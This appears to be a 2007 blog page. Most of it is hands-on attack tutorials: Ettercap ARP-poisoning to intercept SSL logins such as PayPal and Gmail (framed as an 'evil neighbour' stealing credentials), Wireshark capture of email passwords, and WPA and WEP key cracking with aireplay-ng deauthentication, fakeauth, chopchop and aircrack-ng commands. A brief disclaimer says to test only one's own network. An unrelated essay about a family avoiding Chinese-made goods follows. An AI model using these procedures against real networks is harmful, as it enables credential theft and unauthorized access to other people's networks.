Need hosting? DreamHost is the best! Use coupon code M9FREE to get a free domain name for life.

Friday, July 06, 2007

How to crack SSL over a wireless network

Introduction

Do you think you’re safe if you type https :// before paypal.com? I hope you’ll think twice before you login from a computer connected to a wireless network after reading this guide. Let’s start at the beginning. Let’s say you have an evil neighbour who wants your paypal credentials. He buys himself a nice laptop with a wireless card and, if you are using a wep encryption, he cracks your wep code (click here to see how). After cracking the key he logs into your network. Maybe you always allowed him to use your network because you thought it can’t do any harm to your computer. You aren’t sharing any folders so what’s the problem? Well, in the next few steps I’m going to describe the problem.

The guide

1. Let’s assume your neighbour uses linux to crack your wep key. After cracking it, he installs ettercap (http://ettercap.sourceforge.net/) on his linux system. If you want to do this at home, I would recommend you to download BackTrack because it already has everything installed. Look at the WEP cracking guide I mentioned above for more info about BackTrack. If you want to install it on your own linux distribution, download the source and install it with the following commands:

$ tar -xzvf ettercap-version.tar.gz
$ make
$ make install

2. After installing, you need to uncomment some code to enable SSL dissection. Open up a terminal window and type "nano /usr/local/etc/etter.conf", without the quotes. Scroll down using your arrow keys until you find this piece of code:

# if you use iptables:
# redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport"
# redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport"

You need to uncomment the last two lines.

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport"

3. Press CTRL+O, press enter to safe the file and then press CTRL+X.

4. Boot Ettercap and click on Sniff > Unified Sniffing > type in your wireless interface and press ok.

5. Press CTRL+S to scan for hosts

6. Go to MITM > ARP poisoning, select sniff remote connections and press ok.

7. Now you (and your neighbour!) can start sniffing! Press start > start sniffing. Walk to another computer on your network and open up paypal or any other site where you need to type in an username/password (gmail, hotmail, digg.com, etc.). All credentials will appear on the computer running Ettercap!

8. When you’re done, don’t just close Ettercap, but go to Start > Stop Sniffing, and then go to MITM > Stop mitm attack(s).

But how does all this stuff work?

Look at the following scheme:

Normally when you type in a password, host 1 (your computer) directly connects to host 2 (your modem or router). But if someone launced Ettercap on your network, host 1 isn’t sending it’s passwords to host 2, but to the Attacking host, the host that’s running Ettercap! The attacking host sends everything to Host 2. This means that host 1 isn’t noticing anything! Exactly the same happens with everything that host 2 is sending. Host 2 doesn’t send packets directly to host 1, but first to the attacking host.

How to get someone's email username/password

Did you know that everyone using your network (wireless and/or wired) can get the password of you e-mail account? Even if you have protected your network with a wep code your password lies on the street. In this tutorial I’m not going to descibe how to crack wep (sorry folks, maybe next week), but I’m going to describe how to “steal” your own password using a computer in your network.

1. The first step is downloading Wireshark, the succesor of Ethereal from http://wireshark.org/download.html

2. Install Wireshark, also install WinPcap (the installer will ask you i you want to install this, choose yes).

3. Start Wireshark. In the menu at the top select Capture > Options.

4. The Capture Options menu will pop up. In the interface field, choose the network interface you want to use.

5. Choose ‘Capture packets in promiscuous mode’ if you want to capture packets (eg. find a password) generated by another computer on the network than yours.

6. Clear everything in the ‘Capture Filter’ field. We don’t need to use filters at the moment.

7. Don’t touch the rest of the settings. If you want to know the function of a setting, keep your mouse on it for a little while.

8. Click start to start capturing. On the computer where you want to ’steal’ the pass from (to make thing easier the first time, just use the computer that’s running Wireshark, the computer you are working on atm), launch a mail application (Outlook, Thunderbird etc.) and retreive your new mail.

9. Go back to Wireshark and stop the capturing by clicking stop. The captured files will appear. Click ‘protocol’ to sort the packets on their protocol.

10. Search for the protocol ‘pop’ to find your e-mail password. Look below for an example of the packets:

wireshark

11. That’s all! You now have your e-mail account’s username and password! Now trow away your wireless network or everyone can get your password while walking on your street!

Cracking WPA

1. Get yourself a good Linux distribution and download the newest aircrack-ng suite (www.aircrack-ng.org). Also download Kismet.

I would warmly recommend you to use back|track because it already has everything installed. Check the cracking WEP tutorial for information about the back|track installation.

2. Put your wireless card in monitor mode.

There are many different ways to do this. Some may not work with your drivers/card. I will explain one here: Type ‘iwconfig’ in a terminal to see your wireless interfaces (mine is ath0). After that, type ‘iwconfig [interface] mode Monitor’ to put your interface in monitor mode.

3. Start Kismet and wait a few seconds to find all networks in your area. First press ’s’ and then ’f’ to sort the networks and navigate to a WPA enabled network with your arrow keys. Press enter to get more information about the highlighted network. Do this in order to make sure that the network is protected with a WPA encryption. Also remember on which channel the network is running.

4. Now start airodump, by opening a terminal window (you can use the one from the previous step) and typing:

airodump-ng -c [channel] -w wpa [interface]

5. Airodump will find all networks in the area using the channel you entered. Wait for ‘your’ network to show up and wait for a client connecting to that access point. Clients are shown in the list below the list of AP’s.

6. Open a new terminal window and type:

aireplay-ng [interface] –deauth 25 -a [MAC address of the AP*] -h [MAC of the client]

* The MAC address: The number that airodump calls ‘BSSID’. It usually looks like this: 12:34:45:78:89:56

7. The deauth attack will kick the client off the network and force him to reconnect. During this reconnect airodump captures the so called ‘handshake’. To crack the key, start a new terminal window. Keep airodump running. In the new terminal, type:

aircrack-ng -w [full path to dictionary file**] wpa-01.cap

** Search the web for a good dictionary file (try Google with the term “security wordlist”, please post good dictionaries in the comments). If you are using back|track, open a new terminal window and type (HD install only!):

cd /pentest/password/dictionaries
gunzip wordlist.txt.Z

After unzipping, the “full path to dictionary file” is /pentest/password/dictionaries/wordlist.txt.

8. Now wait a long time. This can take hours if you aren’t lucky and if the keyphrase isn’t in the dictionary you’ll never find the key. If the key is found it shows up in aircrack. I’m currently figuring out how rainbow Tables work. From what I read these Rainbow Tables can crack a WPA key in 10 minutes (wow!). Expect a tutorial about how this works within a few days.

Cracking WEP: The Ultimate Guide

##### Preparation #####

1. Download BackTrack (http://www.remote-exploit.org/index.php/BackTrack_Downloads)

2. Install BackTrack to your hd or just boot the live cd (username: root, password: toor; Don’t froget to start the gui: type in startx on the command lien after logging in).

3. Start up a terminal and set your wireless interface in monitor mode.

iwconfig [wireless interface] mode monitor

* to find out what your wireless interface is, type iwconfig and press enter. All interfaces will show up (mine is ath0).

4. Start airodump by typing in the terminal (press enter after typing it in)

airodump-ng –ivs -w capture [wireless interface]

5. When airodump found the network you want to hack it’ll show up. Note the BSSID (acces point’s mac address) and the SSID (the access point’s name). Don’t close this terminal window or stop airodump from running before you have the wep key!

##### Generating data, method one: There are clients visible in airodump associated to the network #####

1. Open a new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] –arpreplay -e [the SSID you found with airodump] -b [the BSSID you found wth airodump] -h [the client’s MAC adress]

2. Open another new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] –deauth 10 -a [the client’s MAC adress]

3. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.

##### Generating data, method two: There are NO clients visible in airodump associated to the network #####

1. Open a new terminal window and type in (do NOT press the enter button!)

aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06

2. Open another new terminal window and type in (do NOT press the enter button!):

aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID you found wth airodump] -h 01:02:03:04:05:06

3. Press enter in the fakeauth terminal and after it started to fakeauth, press enter as quickly as possible in the arpreplay window.

3. Open another new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] –deauth 10 -a 01:02:03:04:05:06

4. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.

##### If the above two methods aren’t working, try this #####

1. Open a new terminal window and type in (press the enter button after typing it in):

aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID you found wth airodump] -h 01:02:03:04:05:06

2. Open another new terminal window and type in (press the enter button after typing it in):

aireplay-ng [wireless interface] –chopchop -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06

3. The chopchop starts reading packages. When it finds one, it’ll ask you to use it. Choose yes. Wait a few seconds/minutes and remember the filename that is given to you at the end.

4. Open Ethereal (click the icon in the bottom left corner > Backtrack > Sniffers > Ethereal) and open the xor file made with the chopchop attack in Ethereal (it’s located in the home folder)

5. Look with Ethereal in the captured file. Try to find the source ip and the destination ip: write those addresses down somewhere.

6. open a terminal and type in (press enter after typing in):

arpforge-ng [the name of the xor file from the chopchop attack] 1 [the BSSID you found wth airodump] 01:02:03:04:05:06 [the source ip] [the destination ip] arp.cap

7. In a new or in the same terinal window, type in (and press enter):

aireplay-ng -2 ath0 -r arp.cap

5. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.

##### The actual cracking of the WEP key #####

1. Open a new terminal window and type in

airecrack-ng -n 64 capture-01.ivs (for a 64 bits encryption, enter after typing)

or

airecrack-ng -n 128 capture-01.ivs (for a 128 bits encryption, enter after typing)

If you don’t know how strong the encryption is, type in both in different terminals and start a third terminal. Type in this code:

airecrack-ng capture-01.ivs

2. Wait a few minutes. Check the terminal(s). The code will automaticly show up if found. Keep airodump running!

##### Disclaimer #####

I don’t think have to mention that you need written permission from the owner of the network before you are allowed to start cracking his wep or even before you are allowed to capture packages. Just try it with your own network. You’ll learn a lot about it. But never ever try it with another network than your own.

##### Donations #####

I hope you enjoyed reading this guide. I did enjoy writing it, but I really don’t enjoy paying the bills for hosting and bandwidth. Please help me keeping this site up and make a small paypal donation to paypal@profit42.com.

Thanks.

Monday, July 02, 2007

A year without 'Made in China'

By Sara Bongiorni

BATON ROUGE, LA. – Last year, two days after Christmas, we kicked China out of the house. Not the country obviously, but bits of plastic, metal, and wood stamped with the words "Made in China." We kept what we already had, but stopped bringing any more in.

The banishment was no fault of China's. It had coated our lives with a cheerful veneer of toys, gadgets, and $10 children's shoes. Sometimes I worried about jobs sent overseas or nasty reports about human rights abuses, but price trumped virtue at our house. We couldn't resist what China was selling.

But on that dark Monday last year, a creeping unease washed over me as I sat on the sofa and surveyed the gloomy wreckage of the holiday. It wasn't until then that I noticed an irrefutable fact: China was taking over the place.

It stared back at me from the empty screen of the television. I spied it in the pile of tennis shoes by the door. It glowed in the lights on the Christmas tree and watched me in the eyes of a doll splayed on the floor. I slipped off the couch and did a quick inventory, sorting gifts into two stacks: China and non-China. The count came to China, 25, the world, 14. Christmas, I realized, had become a holiday made by the Chinese. Suddenly I'd had enough. I wanted China out.

Through tricks and persuasion I got my husband on board, and on Jan. 1 we launched a yearlong household embargo on Chinese imports. The idea wasn't to punish China, which would never feel the pinprick of our protest. And we didn't fool ourselves into thinking we'd bring back a single job to unplugged company towns in Ohio and Georgia. We pushed China out of our lives because we wanted to measure how far it had pushed in. We wanted to know what it would take in time, money, and aggravation to kick our China habit.

We hit the first rut in the road when I discovered our son's toes pressing against the ends of his tennis shoes. I wore myself out hunting for new ones. After two weeks I broke down and spent $60 on sneakers from Italy. I felt sick over the money; it seemed decadent for a pair of children's shoes. I got used to the feeling. Weeks later I shelled out $60 for Texas-made shoes for our toddler daughter.

We got hung up on lots of little things. I drove to half a dozen grocery stores in search of candles for my husband's birthday cake, eventually settling on a box of dusty leftovers I found in the kitchen. The junk drawer has been stuck shut since January. My husband found the part to fix it at Home Depot but left it on the shelf when he spotted the telltale "Made in China."

Mini crises erupted when our blender and television broke down. The television sputtered back to life without intervention, but it was a long, hot summer without smoothies. We killed four mice with old-fashioned snapping traps because the catch-and-release ones we prefer are made in China. Last summer at the beach my husband wore a pair of mismatched flip-flops my mother found in her garage. He'd run out of options at the drug store.

Navigating the toy aisle has been a wilting affair. In the spring, our 4-year-old son launched a countercampaign in support of "China things." He's been a good sport, but he's weary of Danish-made Legos, the only sure bet for birthday gifts for his friends. One morning in October he fell apart during a trip to Target when he developed a sudden lust for an electric purple pumpkin.

"It's too long without China," he wailed. He kept at me all day.

The next morning I drove him back so he could use his birthday money to buy the pumpkin for himself. I kept my fingers off the bills as he passed them to the checker.

My husband bemoans the Christmas gifts he can't buy because they were made in China. He plans to sew sleeping bags for the children himself. He can build wooden boats and guitars, but I fear he will meet his match with thread and needle.

"How hard can it be?" he scoffed.

The funny thing about China's ascent is that we, as a nation, could shut the whole thing down in a week. Jump-start a "Just Say No to Chinese Products Week," and the empire will collapse amid the chaos of overloaded cargo ships in Long Beach harbor. I doubt we could pull it off. Americans may be famously patriotic, but look closely, and you'll see who makes the flag magnets on their car bumpers. These days China delivers every major holiday, Fourth of July included.

I don't know what we will do after Dec. 31 when our family's embargo comes to its official end. China-free living has been a hassle. I have discovered for myself that China doesn't control every aspect of our daily lives, but if you take a close look at the underside of boxes in the toy department, I promise it will give you pause.

Our son knows where he stands on the matter. In the bathtub one evening he told me how happy he was that "the China season" was coming soon.

"When we can buy China things again, let's never stop," he said.

After a year without China I can tell you this: You can still live without it, but it's getting trickier and costlier by the day. And a decade from now I may not be brave enough to try it again.

• Sara Bongiorni is a freelance writer and is working on a book about her family's yearlong adventure in the global economy.